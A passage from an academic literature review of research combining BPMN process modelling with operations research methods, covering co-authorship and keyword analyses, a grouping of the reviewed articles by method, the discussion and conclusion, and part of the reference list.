co-authors’ collaborations with a curve connecting the co-authors. The size of the node of this connection corresponds to the number of documents by the given author. The colours used to distinguish the authors were created using the average years of the publication of their papers. For the authors’ average publication years, the first quartile was 2015, the third quartile was 2018.5 and the median was 2017. The variability outside the lower and upper quartiles Figure 5 Division of authors into groups according to co-authorship. Full-size DOI: 10.7717/peerj-cs.301/fig-5 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 13/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-5 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ was given by 2011 and 2020. We identified one outlier value corresponding to the year 2009. The most prominent groups were around the authors listed in Fig. 6. This figure also contains the number of documents by the authors, their total number of citations and their average value. According to this analysis Wu, P. Y. had the highest number of citations (7.5), followed by De Smedt, J. (7) and Hasic, F. (7). Herbert, L.T. had the most documents (8) and Tomaskova, H. had no co-author connections. The authors were also analyzed in terms of their country or region affiliations. A total of 25 countries were identified and their location, including the number of relevant publications, are shown in Fig. 7. The countries with the highest number of affiliated publications were Denmark (8) and Tunisia (4), followed by Belgium, France, Saudi Arabia, Italy and Spain, who all had three. Keywords analysis The keywords were categorized according to those identified by the published authors and the keywords PLUS assigned by Clarivate Analytics databases. The data in KeyWords Plus are words or phrases that frequently appear in the titles of an article’s references but do not appear in the title of the item itself. Based upon a special algorithm that is unique to Clarivate Analytics databases, KeyWords Plus enhances the power of cited- reference searching by searching across disciplines for all the articles that have cited references in common, more information is on the web link Clarivate Analytics (2018). A total of 130 unique keywords and 46 unique KeyWords Plus keywords were found for selected publications. A total of 130 author keywords were mentioned in the publications and a general view of their interconnection can be seen in Fig. 8. Below is a list of all author keywords with the number of the weight-link to other keywords: activity theory (4), affiliation (6), agent based model (4), agent-based systems engineering (3), airport passenger facilitation (8), atl (5), automated verification (4), Figure 6 Fifteen most successful authors. Full-size DOI: 10.7717/peerj-cs.301/fig-6 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 14/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-6 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ bayesian network (4), bayesian networks (4), bpm (6), bpmn (60), bpmn business processes (4), bpmn extension (3), bpmn model restructuring (5), business process (18), business process automation (3), business process management (13), business process model (5), business process model measures (3), business process modelling notation (4), business process optimisation (5), business process outsourcing (3), business processes (3), cloud computing (3), clustering (5), communication theory (11), configurable reference model (8), consequence modelling and management (10), contextual factors (8), cycle time (4), decision making (15), decision mining (3), decision model and notation (3), decision modeling (4), decision modelling (5), dikw (11), discrete-event simulation (4), dmn (15), effort prediction model (3), engineering agent-based systems (3), engineering systems (6), enterprise risk management (4), eqn (5), evolutionary algorithm (2), evolutionary algorithms (5), facilitated modelling (4), fault tree analysis (6), fault tree generation (6), flow (8), formal risk analysis (6), genetic algorithm (3), healthcare (4), hierarchical clustering (6), incident response (11), integrated modelling (5), interviews (11), jeqn (5), knowledge discovery (6), knowledge management (11), knowledge rediscovery (6), licenses (11), maude (7), mc-dmn (5), mcdm (5), mda (5), metrics (5), model checking (4), model transformations (5), model-driven architecture (4), model-driven engineering (5), modelling (4), object modeling (4), optimisation (6), organizational mining (3), performance (5), performance evaluation (3), petri nets (5), pproduction optimisation (2), preference to criteria (5), prism (8), probability (2), process configuration (8), process enhancement (3), process chain network (5), process merging (8), process mining (6), process modeling (4), process modelling (5), project management (3), qualitative analysis (4), quantitative model checking (10), quantitative service analysis (6), Figure 7 Location of publications in the world, own processing. Full-size DOI: 10.7717/peerj-cs.301/fig-7 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 15/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-7 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ quantitative workflow analysis (4), queues (3), queuing theory (4), reliability analysis and risk assessment methods (4), resource allocation (4), restructuring (6), rewriting logic (7), rules (5), safety assessment software tools (4), safety management and decision making (4), security (11), security operation center (11), sense-making (11), separation of concerns (5), service engineering (6), scheduling (4), simulation (4), simulations (3), social network (5), social network analysis (3), social network model (6), socio-technical systems (sts) (4), soundness (4), space-sensitive process model (8), statistical model checking (4), stocastic bpmn (2), stochastic automata network (3), stochastic bpmn (11), stochastic model checking (13), stochastic modeling and analysis (4), structural and semantic aspects (5), tacit knowledge (11), task analysis (11), task assignment (4), task model (4), timed automata (4), topsis (5), verification (2). As you can see in the figure, most of the author’s keywords are directly or indirectly linked with the term ‘BPMN’, but there are also isolated groups. In the following text, Figure 8 Co-ocurence of Author keywords. Full-size DOI: 10.7717/peerj-cs.301/fig-8 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 16/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-8 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ we’ve listed separate keyword groups. We’ve added a year of publication, a number of citations, and a specific document to which the keywords belong. � 2013; citations; (business process automation; business process model measures; effort prediction model; project management) Aysolmaz, Iren & Demirors (2013). � 2014; citation; (evolutionary algorithm; pproduction optimisation; stocastic bpmn) Herbert et al. (2014), � 2015; citations; (agent based model; bayesian network; business process modelling notation; modelling; socio-technical systems (sts)) Wu et al. (2015), � 2015; citation; (affiliation; bpm; hierarchical clustering; knowledge discovery; knowledge rediscovery; restructuring; social network model) Khlif & Ben-Abdallah (2015), � 2016; citations; (bpmn extension; business process outsourcing; cloud computing; genetic algorithm) Rekik, Boukadi & Ben-Abdallah (2016). � 2017; citations; (bpmn model restructuring; clustering; metrics; rules; social network; structural and semantic aspects) Khlif, Ben-Abdallah & Ben Ayed (2017). � 2019; citations; (atl; business process model; model transformations; model-driven engineering; petri nets; process chain network) Gómez-Martnez et al. (2019). As mentioned above, there were only 46 KeyWords Plus keywords (the number of links to other keywords is given in parentheses after the keyword): accuracy (6), ambiguity (6), automation (3), bpmn (20), business process models (6), checking (6), cognitive effectiveness (7), communities (2), complex (0), confidence (6), context (9), critical path (9), decision-making (7), design (7), dimensions (7), distributed simulation (1), framework (8), functional size (2), group creativity (6), identification (9), Figure 9 Co-ocurence of KeywordsPlus. Full-size DOI: 10.7717/peerj-cs.301/fig-9 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 17/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-9 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ implementation (5), information (6), integration (2), model (7), neural-network (7), organizational knowledge (1), patterns (6), performance (9), process execution (9), process models (9), productivity (2), quality (2), reality (2), reference models (2), resources (9), risk (6), science research (2), semantics (9), sensemaking (1), simulation (9), strategy (0), systems (6), tables (7), verification (15), web (1), workflow (9). As can be seen in Fig. 9, these keywords are far more separate from each other compared to the author’s keywords. Classification of articles by methodology Based on the expert assessment, we examined the documents regarding the methods and approaches used. We created seven groups corresponding to a method or approach that was an essential part of the publication: probabilistic models, Decision Model and Notation (DMN), dynamic task assignment problem, evolutionary and genetics algorithms, queuing theory, social networks and others. These groups were also based on keyword analysis, as some separate groups of copyright keywords belong to highly unique articles. We assigned each document to just one group. That is in contradiction to research areas, where one article can be attributed to more than one research area. The individual documents and their division between research areas and methodological groups can be seen in Table 3. We further analyzed the documents regarding their years of publication and plotted a bubble graph (Fig. 10) with the publication years on the x.axis and the methodological groups on the y-axis. The appropriate number of publications corresponding to the given year and the group is indicated in the respective bubble. This quantity is also graphically represented by the size of the given bubble. The largest group consisted of 10 publications on DMN and BPMN. Given the initiate year of DMN, this is the most significant approach serving with BPMN. DMN 1.0 was made available to the public in September 2015, the OMG group released DMN 1.1 in June 2016, DMN 1.2 was released in January 2019 and the latest version of DMN 1.3 was released in March 2020. The latest version did not affect this systematic search; however, the growth of publications since 2017 (see Fig. 10, for example, was undoubtedly be affected by the DMN update. We only assigned four documents to the methodological group focused on queue theory (See Table 3 and Fig. 10). The specific articles are listed in the following section under the appropriate heading. As the largest group was the DMN and BPMN group, we can thus rule out research question R3. Result: Research question R3—not confirmed. The methods, techniques and approaches used in the included publications are listed in the following section. Probabilistic models The probabilistic model can be used to make decisions when the activity reaches an exclusive splitting gateway and the activity’s subject must decide between alternative Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 18/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ actions. They can be used for predicting or deciding between alternative works based on desirable outcomes. Probabilistic models were presented in the following publications: � Herbert & Sharp (2012): Quantitative analysis of probabilistic BPMN workflows; � Herbert & Sharp (2013): Precise quantitative analysis of probabilistic business process model and notation workflows; � Ceballos, Flores-Solorio & Garcia-Vazquez (2015): Towards Probabilistic Decision Making on Human Activities modeled with Business Process Diagrams; � Ceballos, Flores-Solorio & Pablo Garcia (2015): A Probabilistic BPMN Normal Form to Model and Advise Human Activities; � Naoum et al. (2016): A probabilistic method for business process verification: Reachability, Liveness and deadlock detection, there the (Causal) Bayesian Network or Markov Decision processes were used. Table 3 Documents division according to the research areas and methodological groups. Indexes Abbreviation Science Citation Index Expanded (SCI-EXPANDED) Social Sciences Citation Index (SSCI) Computer science (26) Engineering (16) Operational Research (6) Business economics (5) Probabilistic models (5) Herbert & Sharp (2012, 2013), Ceballos, Flores- Solorio & Garcia-Vazquez (2015), Ceballos, Flores-Solorio & Pablo Garcia (2015), Naoum et al. (2016) Herbert & Sharp (2012), Herbert & Sharp (2013), Ceballos, Flores- Solorio & Garcia-Vazquez (2015) DMN (10) Batoulis & Weske (2017), Ghlala, Aouina & Ben Said (2017), Hasic, De Smedt & Vanthienen (2018), De Smedt et al. (2019), Durán, Rocha & Salaün (2019), Suchenia et al. (2019), Cho, Happa & Creese (2020) Figl et al. (2018), Suchenia et al. (2019), Cho, Happa & Creese (2020) Batoulis & Weske (2017), Hasic, De Smedt & Vanthienen (2018 Batoulis & Weske (2017), Tomaskova (2018), Mazhar, Wu & Rosemann (2018) Dynamic task assignment problem (1) Xie, Chien & Tang (2016) Xie, Chien & Tang (2016) Evolutionary and genetic algorithms (5) Herbert & Sharp (2014b), Rekik, Boukadi & Ben-Abdallah (2016) Herbert & Sharp (2014b), Herbert et al. (2014), Herbert, Hansen & Jacobsen (2015), Herbert & Hansen (2016) Herbert & Hansen (2016) Queuing theory (4) Bocciarelli & D’Ambrogio (2012), Bahaweres, Fitriyah & Rozy (2017), Gómez-Martnez et al. (2019) Bocciarelli & D’Ambrogio (2012) Onggo et al. (2018) Onggo et al. (2018) Social network (2) Khlif & Ben-Abdallah (2015) Khlif, Ben-Abdallah & Ben Ayed (2017) Other (9) Kamrani et al. (2009), Braghetto, Ferreira & Vincent (2011), Aysolmaz, Iren & Demirors (2013), Burattin, Sperduti & Veluscek (2013), Wu et al. (2015), Mendoza Morales, Monsalve & Villavicencio (2017), Duran, Rocha & Salaun (2018) Kamrani et al. (2009), Burattin, Sperduti & Veluscek (2013), Herbert & Sharp (2014a), Herbert, Hansen & Jacobsen (2014) Kamrani et al. (2009), Wu et al. (2015) Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 19/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ DMN and decision analysis Decision Model and Notation (DMN) is an industry standard for modeling and executing decisions that are determined by business rules. The association of DMN and BPMN is now common practice: � Batoulis & Weske (2017): Soundness of decision-aware business processes, � De Smedt et al. (2019): Holistic discovery of decision models from process execution data, � Durán, Rocha & Salaün (2019): A rewriting logic approach to resource allocation analysis in business process models, � Figl et al. (2018): What we know and what we do not know about DMN, � Ghlala, Aouina & Ben Said (2017): MC-DMN: Meeting MCDM with DMN Involving Multi-criteria Decision-Making in Business Process � Hasic, De Smedt & Vanthienen (2018): Augmenting processes with decision intelligence: Principles for integrated modelling � Cho, Happa & Creese (2020): Capturing Tacit Knowledge in Security Operation Centers, � Mazhar, Wu & Rosemann (2018): Designing complex socio-technical process systems - the airport example, � Suchenia et al. (2019): Towards knowledge interoperability between the UML, DMN, BPMN and CMMN models � Tomaskova (2018): Modeling Business Processes for Decision-Making. Both standards fall under OMG. Dynamic task assignment approach The study : A dynamic task assignment approach based on individual worklists for minimizing the cycle time of business processes by Xie, Chien & Tang (2016) develop a Figure 10 Buble graph—quantity of article according to methodological groups and publication year. Full-size DOI: 10.7717/peerj-cs.301/fig-10 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 20/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-10 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ dynamic task assignment approach for minimizing the cycle time of business processes. The contribution of this article lies in developing a dynamic task assignment approach based on queuing theory, individual worklist model, and stochastic theory. Evolutionary and genetic algorithms The evolutionary algorithm was applied in the following publications: � Herbert & Sharp (2014b): Optimisation of BPMN business models via model checking; � Herbert et al. (2014): Evolutionary optimization of production materials workflow processes; � Herbert, Hansen & Jacobsen (2015): Using quantitative stochastic model checking tool to increase safety and improve efficiency in production processes; � Herbert & Hansen (2016): Restructuring of workflows to minimise errors via stochastic model checking: An automated evolutionary approach; to optimize the BP diagram, thus looking for a more efficient process. Especially the publication: Specifying business process outsourcing requirements, Rekik, Boukadi & Ben-Abdallah (2016), presented a genetic algorithm to identify most appropriate activities of a business process that should be outsourced. Queuing theory In the article: Comparative analysis of business process litigation using queue theory and simulation (case study: Religious courts of South Jakarta) Bahaweres, Fitriyah & Rozy (2017), Onggo et al. (2018). A BPMN extension to support discrete-event simulation for healthcare applications: an explicit representation of queues, attributes and data-driven decision points Onggo et al. (2018) and Gómez-Martnez et al. (2019). Formal Support of Process Chain Networks using Model-driven Engineering and Petri nets Gómez- Martnez et al. (2019), the authors use queuing theory and simulation to compare processes modeled in BPMN. In the article: Automated performance analysis of business processes Bocciarelli & D’Ambrogio (2012), authors presented a BP performance model of EQN (Extended Queueing Network) type. Social network The publications below focus on the application of social network analysis metrics (SNA) to studies of biological interaction networks in informatics. � Khlif & Ben-Abdallah (2015): Semantic and structural performer clustering in BPMN models transformed into social network models; � Khlif, Ben-Abdallah & Ben Ayed (2017): A methodology for the semantic and structural restructuring of BPMN models. Other approaches The following publications were unique in their approaches. We can mention for example: Workflow fault tree generation through model checking by Herbert & Sharp (2014a) with Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 21/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ FMEA analysis. An effort prediction model based on BPM measures for process by Aysolmaz, Iren & Demirors (2013) with Linear multiple regression analysis. Performance evaluation of business processes through a formal transformation to SAN by Braghetto, Ferreira & Vincent (2011) using Stochastic Automata Network. Estimating performance of a business process model by Kamrani et al. (2009) using a Task assignment approach. Formal verification of business processes as timed automata by Mendoza Morales, Monsalve & Villavicencio (2017) convert BPMN to Timed Automata and then perform standard Queuing analysis. Business models enhancement through discovery of roles by Burattin, Sperduti & Veluscek (2013), there the authors have extended the process model to roles, specifically designed role-sharing algorithm. Stochastic analysis of BPMN with time in rewriting logic by Duran, Rocha & Salaun (2018) presents a rewriting logic executable specification of BPMN with time and extended with probabilities. SBAT: A STOCHASTIC BPMN ANALYSIS TOOL by Herbert, Hansen & Jacobsen (2014) presents SBAT, a tool framework for the modelling and analysis of complex business workflows and A framework for model integration and holistic modelling of socio-technical systems by Wu et al. (2015) presents a layered framework for the purposes of integrating different socio-technical systems (STS) models and perspectives into a whole-of-systems model. DISCUSSION We have identified several gaps in the research and issues that need to be addressed in future research. The main gaps concern the research area of business economics. We assumed that this area would be the main and most frequent for the combination of BPMN and OR methods. However, we found that this area could be affected by the absence of specific notation. The relevant publications were written only after the release of version DMN 1.1. The effect of DMN notation will be addressed in future research. An unexpected gap was a solution to finance and human resources management through OR. We would like to introduce publications Savku & Weber (2018) and Graczyk- Kucharska et al. (2020) as the pioneering works. The first article added the problem of optimal consumption problem from cash flow with delay and regimes. The authors developed the general analytic model setting and methods for the solution by studying a stochastic optimal control problem using the tools of the maximum principle. They proved the necessary and sufficient maximum principles for a delayed jump-diffusion with regimes under full and partial information. The second publication focused on transversal competencies, which are sets of knowledge, skills and attitudes required for different positions and in different professions. The authors used the method of multivariate additive regression spline together with artificial neural networks to create a model describing the influence of various variables on the acceleration of the acquisition of transverse competencies. We assume that future research will be influenced by simulation and prediction methods. This study showed the use of Agent-based modelling methods and discrete- event simulations, or probabilistic models and social networks, but neural networks or artificial intelligence methods appeared in any publication. Based on this study, we further expect the use of more sophisticated approaches and the effect of new techniques. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 22/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ At the same time, it is possible to extend process modelling to inaccurate data using Fuzzy methods. CONCLUSION This paper presented a systematic overview of publications using BPMN and OR methods in process analysis. We analyzed 108 articles, that were selected using the appropriate strings in the advanced search option of in the WOS database. The papers that met the conditions of the study were subjected to various analyzes and were briefly described. The review showed that the processes modelled by BPMN can be extended or analyzed as probabilistic processes, queue theory, or role and task assignments. Alternatively, processes can be optimized using evolutionary or genetic algorithms. The research also highlighted the need to identify keywords in publications correctly. For example, less than two-thirds of the selected articles contained the keyword BPMN, even though all the documents used this notation. Most of the articles were so-called one-off publications. Only a small number of author teams developed their topic in further continuing publications. Due to this, the average number of citations is relatively low. Due to the average number of citations to the total number of publications in all research areas, documents falling into the field of Operational Research are outstanding; there is an average of seven citations per article. We analyzed the publications by research area and found that there is great potential for the research area of business economics (BE). Only a few papers were associated with this area (five in total) but all of them had a higher than average number of citations. The first document we included in this research area was published in 2017, that is only in the last quarter of the examined publication years. This focus on BE may have been initiated by the introduction of DMN notation. Among the authors, smaller collaborating groups around the world were been identified. That groups co-work within the framework of co-authorship and co-citations. We only identified one single-author publication. The analysis of keywords showed a significant difference between the keywords assigned by the authors and the so-called KeyWords Plus keywords. While the former were almost completely connected across publications, the latter were significantly diversified. We have pointed out that the introduction of BPMN 2.0 led to an increase in publications using this notation. ACKNOWLEDGEMENTS The authors thank the student M. Kopecký for support in the field of BPMN modeling. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research has been supported by a GACR 18-01246S and by the Faculty of Informatics and Management UHK Specific Research Project. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 23/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ Grant Disclosures The following grant information was disclosed by the authors: GACR 18-01246S. Faculty of Informatics and Management UHK Specific Research Project. Competing Interests The author declares that they have no competing interests. Author Contributions � Hana Tomaskova conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Gerhard-Wilhelm Weber analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: This article does not contain data or code because it is a literature review. REFERENCES Agatz N, Erera A, Savelsbergh M, Wang X. 2012. Optimization for dynamic ride-sharing: a review. European Journal of Operational Research 223(2):295–303 DOI 10.1016/j.ejor.2012.05.028. Aguilar-Saven RS. 2004. Business process modelling: review and framework. International Journal of Production Economics 90(2):129–149 DOI 10.1016/S0925-5273(03)00102-6. Aysolmaz B, Iren D, Demirors O. 2013. An effort prediction model based on bpm measures for process automation. In: Nurcan S, Proper H, Soffer P, Krogstie J, Schmidt R, Halpin T, Bider I, eds. Enterprise, Business-Process and Information Systems Modeling, BPMDS 2013. Volume 147 of Lecture Notes in Business Information Processing. 14th International Conference on Business Process Modeling, Development, and Support (BPMDS) /18th International Conference on Exploring Modeling Methods for Systems Analysis and Design (EMMSAD), CAiSE, Valencia, Spain, June 17–18, 2013, 154–167. Bacovsky M, Gavalec M, Tomaskova H. 2013. Inverse fuzzy eigenproblem in databases. In: Vojackova H, ed. Mathematical Methods in Economics 2013, PTS I AND II. 31st International Conference on Mathematical Methods in Economics, Jihlava, CZECH REPUBLIC, SEP 11–13, 2013, 13–18. Bahaweres RB, Fitriyah A, Rozy NF. 2017. Comparative analysis of business process litigation using queue theory and simulation (case study: Religious courts of south jakarta). In: 2017 5th International Conference on Cyber and IT Service Management (CITSM 2017), August 8–10, 2017, Denpasar, Indonesia. 410–416. Batoulis K, Weske M. 2017. Soundness of decision-aware business processes. In: Carmona J, Engels G, Kumar A, eds. Business Process Management Forum, Lecture Notes in Business Information Processing, Vol. 297, 106–124, SIGNAVIO; Celonis; IBM; Diputacio Tarragona; Bizagi; CA Technologies; DCR; Myinvenio. 15th International Conference on Business Process Management (BPM), Barcelona, Spain, September 10–15, 2017. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 24/32 http://dx.doi.org/10.1016/j.ejor.2012.05.028 http://dx.doi.org/10.1016/S0925-5273(03)00102-6 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ Birge JR, Louveaux F. 2011. Introduction to stochastic programming. Berlin: Springer Science & Business Media. Bocciarelli P, D’Ambrogio A. 2012. Automated performance analysis of business processes. In: Wainer G, Mosterman P, DAmbrogio A, Zacharewicz G, eds. Theory of Modeling and Simulation - DEVS Integrative M&S Symposium 2012 (DEVS 2012), volume 44 of Simulation Series. 266–274, Soc Modeling & Simulat. Theory of Modeling and Simulation - DEVS Integrative M&S Symposium (DEVS 2012), Orlando, FL, March 26–30, 2012. Braghetto KR, Ferreira JE, Vincent J-M. 2011. Performance evaluation of business processes through a formal transformation to san. In: Thomas N, ed. Computer Performance Engineering, volume 6977 of Lecture Notes in Computer Science. 42+ 8th European Performance Engineering Workshop, EPEW 2011, Borrowdale, United Kingdom, October 12–13, 2011. Burattin A, Sperduti A, Veluscek M. 2013. Business models enhancement through discovery of roles. In: 2013 IEEE Symposium on Computational Intelligence and Data Mining (CIDM). 103–110, IEEE; IEEE Computat Intelligence Soc. IEEE Symposium on Computational Intelligence and Data Mining (CIDM), April 16–19, 2013. Piscataway: IEEE. Ceballos HG, Flores-Solorio V, Garcia-Vazquez JP. 2015. Towards probabilistic decision making on human activities modeled with business process diagrams. In: Proceedings of the 2015 International Conference on Autonomous Agents & Multiagent Systems (AAMAS’15), 1651–1652, Assoc Comp Machinery; IFAAMAS; NSF; Artificial Intelligence; ACM SIGAI; ARGELA; Microsoft Res; Fundamentals Collect Adapt Sysgt; Japan Soc Software Sci & Technol; Teknoparkistanbul; ACM In Cooperat. 14th International Conference on Autonomous Agents and Multiagent Systems (AAMAS), Istanbul, Turkey, May 4–8, 2015. Ceballos HG, Flores-Solorio V, Pablo Garcia J. 2015. A probabilistic bpmn normal form to model and advise human activities. In: Baldoni M, Baresi L, Dastani M, eds. Engineering Multi-Agent Systems, EMAS 2015, volume 9318 of Lecture Notes in Artificial Intelligence. 51–69, 3rd International Workshop on Engineering Multi-Agent Systems (EMAS), Turkey, May 05, 2015. Certo S. 2003. Influencing initial public offering investors with prestige: signaling with board structures. Academy of Management Review 28(3):432–446 DOI 10.5465/amr.2003.10196754. Cheng Y, Zhao S, Cheng B, Chen X, Chen J. 2019. Modeling and deploying iot-aware business process applications in sensor networks. Sensors 19(1):111 DOI 10.3390/s19010111. Chinosi M, Trombetta A. 2012. BPMN: an introduction to the standard. Computer Standards & Interfaces 34(1):124–134 DOI 10.1016/j.csi.2011.06.002. Cho SY, Happa J, Creese S. 2020. Capturing tacit knowledge in security operation centers. IEEE Access 8:42021–42041 DOI 10.1109/ACCESS.2020.2976076. Cimler R, Cimr D, Kuhnova J, Tomaskova H. 2017. Novel effective algorithm for synchronization problem in directed graph. In: Nguyen N, Papadopoulos G, Jedrzejowicz P, Trawinski B, Vossen G, eds. Computational Collective Intelligence, ICCCI 2017, PT I, volume 10448 of Lecture Notes in Artificial Intelligence. 528–537, Univ Cyprus; Wroclaw Univ Sci & Technol. 9th International Conference on Computational Collective Intelligence (ICCCI), Nicosia, Cyprus, September 27–29, 2017. Cimler R, Tomaskova H, Kuhnova J, Dolezal O, Pscheidl P, Kuca K. 2018. Numeric, agent-based or system dynamics model? Which modeling approach is the best for vast population simulation? Current Alzheimer Research 15(8):789–797 DOI 10.2174/1567205015666180202094551. Cimr D, Cimler R, Tomaskova H. 2018. Construction of an optimal timetable schedule in accordance with user preferences using the graph coloring algorithm. In: Soliman K, ed. Innovation Management and Education Excellence Through Vision 2020, VOLS I -XI. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 25/32 http://dx.doi.org/10.5465/amr.2003.10196754 http://dx.doi.org/10.3390/s19010111 http://dx.doi.org/10.1016/j.csi.2011.06.002 http://dx.doi.org/10.1109/ACCESS.2020.2976076 http://dx.doi.org/10.2174/1567205015666180202094551 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ 6940–6946, Int Business Informat Management Assoc. 31st International-Business- Information-Management-Association Conference, Milan, Italy, April 25–26, 2018. Clarivate Analytics. 2018. Keywords plus generation, creation, and changes. Available at https://support.clarivate.com/ScientificandAcademicResearch/s/article/KeyWords-Plus- generation-creation-and-changes?language=en_US (accessed 17 July 2020). Clarivate Analytics. 2019. Web of science categories. Available at https://images.webofknowledge. com/images/help/WOS/hp_subject_category_terms_tasca.html (accessed 7 July 2020). Cobo MJ, López-Herrera AG, Herrera-Viedma E, Herrera F. 2011. Science mapping software tools: Review, analysis, and cooperative study among tools. Journal of the American Society for Information Science and Technology 62(7):1382–1402 DOI 10.1002/asi.21525. Dani VS, Freitas CMDS, Thom LH. 2019. Ten years of visualization of business process models: a systematic literature review Computer Standards & Interfaces 66:103347. Dantzig GB. 1998. Linear programming and extensions. Vol. 48. Princeton: Princeton University Press. De Ramon Fernandez A, Ruiz Fernandez D, Sabuco Garcia Y. 2019. Business process management for optimizing clinical processes: a systematic literature review. Health Informatics Journal 26(2):1305–1320 DOI 10.1177/1460458219877092. De Smedt J, Hasic F, Van den Broucke SKLM, Vanthienen J. 2019. Holistic discovery of decision models from process execution data. Knowledge-Based Systems 183:104866 DOI 10.1016/j.knosys.2019.104866. Dedrick J, Gurbaxani V, Kraemer K. 2003. Information technology and economic performance: a critical review of the empirical evidence. ACM Computing Surveys 35(1):1–28 DOI 10.1145/641865.641866. Dorfman R, Samuelson PA, Solow RM. 1987. Linear programming and economic analysis. Chelmsford: Courier Corporation. Dubey SK. 2010. A review on relation between operation research and different field of sciences. International Journal of Advanced Research in Computer Science 1(4):80–81. Duran F, Rocha C, Salaun G. 2018. Stochastic analysis of BPMN with time in rewriting logic. Science of Computer Programming 168:1–17 DOI 10.1016/j.scico.2018.08.007. Durán F, Rocha C, Salaün G. 2019. A rewriting logic approach to resource allocation analysis in business process models. Science of Computer Programming 183:102303 DOI 10.1016/j.scico.2019.102303. Euler L. 1775. Lettres a une princesse d’allemagne. Letters 2:102–108. Figl K, Mendling J, Tokdemir G, Vanthienen J. 2018. What we know and what we do not know about dmn. Enterprise Modelling and Information Systems Architectures 13:1–16. Garcia R. 2005. Uses of agent-based modeling in innovation/new product development research. Journal of Product Innovation Management 22(5):380–398 DOI 10.1111/j.1540-5885.2005.00136.x. Gavalec M, Mls K, Tomaskova H. 2015. Optimization of the ordinal and cardinal consistency of a preference matrix in decision making. In: Alonso J, Bustince H, Reformat M, eds. Proceedings of the 2015 Conference of the International Fuzzy Systems Association and the European Society for Fuzzy Logic and Technology, volume 89 of Advances in Intelligent Systems Research. 851–856, Int Fuzzy Syst Assoc; European Soc Fuzzy Log & Technol. 16th World Congress of the International-Fuzzy-Systems-Association (IFSA)/9th Conference of the European-Society-for- Fuzzy-Logic-and-Technology (EUSFLAT), Gijon, Spain, June 30–July 03, 2015. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 26/32 https://support.clarivate.com/ScientificandAcademicResearch/s/article/KeyWords-Plus-generation-creation-and-changes?language=en_US https://support.clarivate.com/ScientificandAcademicResearch/s/article/KeyWords-Plus-generation-creation-and-changes?language=en_US https://images.webofknowledge.com/images/help/WOS/hp_subject_category_terms_tasca.html https://images.webofknowledge.com/images/help/WOS/hp_subject_category_terms_tasca.html http://dx.doi.org/10.1002/asi.21525 http://dx.doi.org/10.1177/1460458219877092 http://dx.doi.org/10.1016/j.knosys.2019.104866 http://dx.doi.org/10.1145/641865.641866 http://dx.doi.org/10.1016/j.scico.2018.08.007 http://dx.doi.org/10.1016/j.scico.2019.102303 http://dx.doi.org/10.1111/j.1540-5885.2005.00136.x http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ Gavalec M, Plavka J, Tomaskova H. 2014. Interval eigenproblem in max-min algebra. Linear Algebra and its Applications 440:24–33 DOI 10.1016/j.laa.2013.10.034. Gavalec M, Tomaskova H. 2010. Eigenspace of a circulant max-min matrix. Kybernetika 46(3, SI):397–404 International Conference on Mathematical Methods in Economy and Industry, Univ S Bohemia, Ceske Budejovice, Czech Republic, June 15–18, 2009. Ghlala R, Aouina ZK, Ben Said L. 2017. MC-DMN: meeting MCDM with DMN involving multi- criteria decision-making in business process. In: Gervasi O, Murgante B, Misra S, Borruso G, Torre CM, Rocha AMAC, Taniar D, Apduhan BO, Stankova E, Cuzzocrea A, eds. Computational Science and its Applications - ICCSA 2017, PT VI, volume 10409 of Lecture Notes in Computer Science. 3–16, Univ Trieste; Univ Perugia; Univ Basilicata; Monash Univ; Kyushu Sangyo Univ; Univ Minho. 17th International Conference on Computational Science and its Applications (ICCSA), Trieste, Italy, July 03–06, 2017. Glassey O. 2008. A case study on process modelling—three questions and three techniques. Decision Support Systems 44(4):842–853 DOI 10.1016/j.dss.2007.10.004. Graczyk-Kucharska M, Özmen A, Szafrański M, Weber GW, Golińśki M, Spychaa M. 2020. 